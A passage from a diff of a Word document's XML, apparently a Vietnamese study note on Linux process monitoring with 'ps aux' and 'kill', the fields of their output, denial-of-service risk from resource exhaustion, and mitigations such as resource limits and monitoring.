-        <w:t>tiêu</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>thụ</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> CPU </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nhiều</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nhất</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">. </w:t>
+        <w:t xml:space="preserve">ps aux </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">để lọc những tiến trình đang tiêu thụ CPU nhiều nhất. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3491,1037 +922,65 @@
         <w:t>kill</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>để</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ngắt</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tiến</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>trình</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ngay</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lập</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tức</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> để ngắt tiến trình ngay lập tức</w:t>
+      </w:r>
       <w:r>
         <w:br/>
-        <w:t xml:space="preserve">- Output </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nào</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>c</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ầ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>chú</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> ý?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">+ PID: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>mã</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>định</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>danh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>duy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nhất</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>của</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tiến</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>trình</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">+ %CPU </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>và</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> %MEM: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tiến</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>trình</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>đang</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ngốn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>bao</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nhiêu</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>phần</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>trăm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sức</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>mạnh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>xử</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lý</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>và</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>bộ</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nhớ</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> RAM</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">+ USER: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>người</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> dung </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nào</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>đang</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>thao</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tác</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tiến</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>trình</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>này</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">+ COMMAND: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Hiển</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>thị</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>chính</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>xác</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tên</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lệnh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hoặc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>đường</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>dẫn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> file </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>đang</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>chạ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>y</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>giúp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nhận</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>diện</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>đó</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>là</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>chương</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>trình</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>gì</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>- Output nào cần chú ý?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>+ PID: mã định danh duy nhất của tiến trình</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>+ %CPU và %MEM: tiến trình đang ngốn bao nhiêu phần trăm sức mạnh xử lý và bộ nhớ RAM</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>+ USER: người dung nào đang thao tác tiến trình này</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>+ COMMAND: Hiển thị chính xác tên lệnh hoặc đường dẫn file đang chạy, giúp nhận diện đó là chương trình gì</w:t>
+      </w:r>
       <w:r>
         <w:br/>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Có</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>r</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ủ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ro</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>b</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ả</w:t>
-      </w:r>
-      <w:r>
-        <w:t>o</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>m</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ậ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nào</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Bị</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cạn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>kiệt</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tài</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nguyên</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>dẫn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>đến</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tấn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>công</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>từ</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>chối</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>dịch</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>vụ</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>DoS</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>)</w:t>
+        <w:t>- Có rủi ro bảo mật nào?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Bị cạn kiệt tài nguyên dẫn đến tấn công từ chối dịch vụ (DoS)</w:t>
       </w:r>
       <w:r>
         <w:br/>
-        <w:t>- N</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ế</w:t>
-      </w:r>
-      <w:r>
-        <w:t>u là h</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ệ</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> th</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ố</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ng th</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ậ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t thì c</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ầ</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">n </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>x</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ử</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lý</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>gì</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>thêm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">+ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Hạn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>chế</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lạm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>dụng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> kill -9</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">+ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Điều</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tra</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nguồn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>gốc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">+ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Thiết</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lập</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>giới</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hạn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">: CPU, RAM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tối</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>đa</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>một</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tiến</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>trình</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>được</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>phép</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sử</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>dụng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">+ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Triển</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>khai</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hệ</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>thống</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>giám</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sát</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>và</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>phản</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
